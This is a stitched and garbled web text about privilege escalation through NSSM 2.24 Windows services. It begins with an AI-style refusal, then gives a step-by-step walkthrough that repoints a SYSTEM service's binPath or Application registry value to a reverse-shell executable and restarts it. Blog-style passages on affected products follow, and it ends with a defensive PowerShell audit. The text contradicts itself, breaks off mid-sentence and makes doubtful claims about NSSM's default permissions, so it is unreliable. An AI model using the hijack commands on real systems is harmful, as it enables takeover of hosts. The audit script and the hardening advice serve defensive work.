I’m unable to provide a full exploit or walkthrough for a privilege escalation vulnerability in NSSM 2.24, as that could be used maliciously. However, I can share general, educational information about why such vulnerabilities historically existed in older versions of NSSM (Non-Sucking Service Manager).
Known issue pattern (historical):
In NSSM versions prior to 2.24 (and sometimes including 2.24 depending on configuration), a privilege escalation was possible if:
nssm edit <service> allows modification of service configuration without proper access control checks, enabling a user with SERVICE_CHANGE_CONFIG permission to change the binary path to a malicious executable.
Secure alternatives for modern systems:
Create services with New-Service and a proper SDDL.
Use WinSW or native Windows services.
Install under %ProgramFiles% or %SystemRoot%, not user-writable directories.
Grant SERVICE_CHANGE_CONFIG only to admins via the service DACL.
If you’re a security researcher testing NSSM 2.24 in a lab, review:
Would you like a non-exploit explanation of how to detect weak NSSM service configurations instead?
Published: For educational and defensive security purposes. Always obtain permission before testing on any system you do not own.
Non-Sucking Service Manager (NSSM) version 2.24 does not have a unique, built-in "exploit" or CVE inherent to its code. Instead, privilege escalation involving NSSM almost always stems from insecure deployment configurations. Because NSSM is an executable used to wrap other applications as services, it is a high-value target for attackers who have already gained a foothold on a system.
Primary Escalation Vectors
When NSSM 2.24 is present, it is usually targeted via three common Windows service misconfigurations:
NSSM 2.24 does not enforce a restrictive DACL (Discretionary Access Control List) on created services. Instead, it relies on Windows defaults, which may allow SERVICE_CHANGE_CONFIG to non-admin users when the service is created during an administrative session but without explicit security hardening.
Assume: MyNSSMService runs as SYSTEM.
Step 1 – Identify NSSM services
sc query state= all | findstr /i "SERVICE_NAME"
sc qc MyNSSMService | findstr /i "BINARY_PATH_NAME"
Look for nssm.exe in the path or the Parameters\Application registry key.
Step 2 – Check your permissions
accesschk.exe -accepteula -uvwqk "HKLM\SYSTEM\CurrentControlSet\Services\MyNSSMService"
Or simpler: try to change the binary path.
Step 3 – Modify the service to run your payload
sc config MyNSSMService binPath= "cmd.exe /c C:\temp\reverse_shell.exe"
Or via registry (if direct sc fails):
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MyNSSMService\Parameters" /v Application /t REG_SZ /d "C:\temp\evil.exe" /f
Step 4 – Restart the service
net stop MyNSSMService
net start MyNSSMService
Your payload runs as SYSTEM. Game over.
When NSSM installs a service using the command:
nssm install <ServiceName> <path-to-executable>
It creates a service with the following security descriptor (by default):
SERVICE_START, SERVICE_STOP, SERVICE_QUERY_CONFIG, and SERVICE_CHANGE_CONFIG granted to the Everyone or Authenticated Users group, depending on Windows version and NSSM build flags.
This allows an unprivileged user to:
Change binPath to point to a malicious executable.
Run that executable as SYSTEM.
Modern service managers include safeguards against arbitrary binary replacement and insecure service configuration modification. NSSM 2.24, however, was designed for convenience, not security. Its core features that enable privilege escalation include:
Service parameters stored under HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Parameters, but older versions fail to enforce strict permissions.
NSSM is convenient but dangerous if misconfigured. Always assume that a service running as SYSTEM with writable configuration is a local privilege escalation vector. Audit your endpoints, and don’t let convenience override security.
Disclaimer: This post is for educational and defensive purposes only. Unauthorized access to systems is illegal.
While NSSM 2.24 is a legitimate tool used to manage Windows services, it is often central to privilege escalation attacks due to improper deployment permissions rather than a flaw in its own source code.
When NSSM is bundled with third-party installers, it frequently inherits weak folder or file permissions, allowing low-privileged users to replace the nssm.exe binary or its managed application with malicious code.
Key Attack Vectors
Improper File Permissions: Many applications (e.g., Wowza Streaming Engine, Apache CouchDB, Phoenix Contact) have been found to install NSSM with "Full Control" for the "Everyone" or "Users" group. Attackers can swap the binary with a malicious executable, which then runs with SYSTEM privileges upon the next service restart.
Unquoted Service Paths: If the service path to NSSM contains spaces and is not enclosed in quotes, Windows may attempt to execute files at different points in the path. For example, if installed in C:\Program Files (x86)\App Name\nssm.exe, an attacker with write access to C:\ could place a malicious file at C:\Program.exe to gain elevated access.
Weak Registry Permissions: If the registry keys governing the NSSM service (e.g., ImagePath) are writable by unprivileged users, they can modify the service configuration to execute arbitrary payloads.
Known Affected Products (Examples)
Wowza Streaming Engine 4.5.0: Vulnerable via replacing the nssm_x64.exe binary due to improper permissions.
Apache CouchDB 2.0.0: Vulnerable because files inherited parent directory permissions, allowing the substitution of nssm.exe.
Phoenix Contact Device & Update Management: Misconfigured permissions on nssm.exe allowed local privilege escalation.
Mitigation and Defense
A service installed with NSSM runs under a
HKLM\SYSTEM\CurrentControlSet\Services\<NSSM_Service>\Parameters\Application.
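As an added defensive example (not code from the original post or from the NSSM project), the following PowerShell audit enumerates services wrapped by nssm.exe and reports the weaknesses described above: a service DACL granting SERVICE_CHANGE_CONFIG to low-privileged principals, writable service or Parameters registry keys, writable nssm.exe or wrapped-application binaries, and unquoted image paths. Rather than assuming the default descriptor the text describes, it reads the actual DACL with sc.exe sdshow; the function and variable names are this script's own.

```powershell
# Added defensive audit, not NSSM's own code: read-only, run elevated on the host under review.
# Principals whose write access on a service, its keys or its binaries is a finding,
# as Windows names and as the equivalent SDDL aliases (WD=Everyone, BU=Users, AU=Authenticated, IU=Interactive).
$LowPriv     = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$LowPrivSddl = 'WD|BU|AU|IU'
$RegWrite  = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, ChangePermissions, TakeOwnership, FullControl'
$FileWrite = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, ChangePermissions, TakeOwnership, FullControl'

# First Allow ACE giving a low-privileged principal any write right, or nothing.
# Caveat: generic rights (e.g. GENERIC_WRITE on inherited ACEs) are not expanded and may be missed.
function Test-WeakAce($Rules, $RightsProp, $WriteMask) {
    foreach ($r in $Rules) {
        if ($r.AccessControlType -ne 'Allow' -or $LowPriv -notcontains $r.IdentityReference.Value) { continue }
        if (([int]$r.$RightsProp -band [int]$WriteMask) -ne 0) { return "$($r.IdentityReference): $($r.$RightsProp)" }
    }
}

function Get-NssmServiceFindings {
    $out = New-Object System.Collections.Generic.List[object]
    $add = { param($svc, $check, $detail) $out.Add([pscustomobject]@{ Service = $svc.Name; Check = $check; Detail = $detail }) }
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName -match '(?i)nssm(_x64|_x86)?\.exe' }) {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        # 1. Service object DACL: DC = SERVICE_CHANGE_CONFIG; WD/WO/GA/GW allow the DACL itself to be rewritten.
        $sddl = (sc.exe sdshow $svc.Name) -join ''
        foreach ($m in [regex]::Matches($sddl, "\(A;[^;]*;([^;]*);;;($LowPrivSddl)\)")) {
            $rights = [regex]::Matches($m.Groups[1].Value, '..') | ForEach-Object { $_.Value }
            if ($rights | Where-Object { 'DC', 'WD', 'WO', 'GA', 'GW' -contains $_ }) { & $add $svc 'Service DACL' $m.Value }
        }
        # 2. Registry: ImagePath lives on the service key, NSSM's Application value under \Parameters.
        foreach ($k in @($key, "$key\Parameters") | Where-Object { Test-Path $_ }) {
            $hit = Test-WeakAce (Get-Acl $k).Access 'RegistryRights' $RegWrite
            if ($hit) { & $add $svc "Registry $k" $hit }
        }
        # 3. Files: nssm.exe and the wrapped application both execute as the service account.
        $quoted = $svc.PathName -match '^"([^"]+)"'
        $exe = if ($quoted) { $Matches[1] } elseif ($svc.PathName -match '(?i)^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
        $app = (Get-ItemProperty "$key\Parameters" -Name Application -ErrorAction SilentlyContinue).Application
        foreach ($f in @($exe, $app) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }) {
            $hit = Test-WeakAce (Get-Acl -LiteralPath $f).Access 'FileSystemRights' $FileWrite
            if ($hit) { & $add $svc "File $f" $hit }
        }
        # 4. Unquoted image path with spaces (the C:\Program.exe search-order problem).
        if (-not $quoted -and $exe -match '\s') { & $add $svc 'Unquoted path' $svc.PathName }
    }
    return $out
}

Get-NssmServiceFindings | Format-Table -AutoSize
```

Every row returned is something to fix with icacls, a tighter service SDDL (sc.exe sdset), or by quoting the ImagePath; an empty result on a host with NSSM services is the expected healthy state.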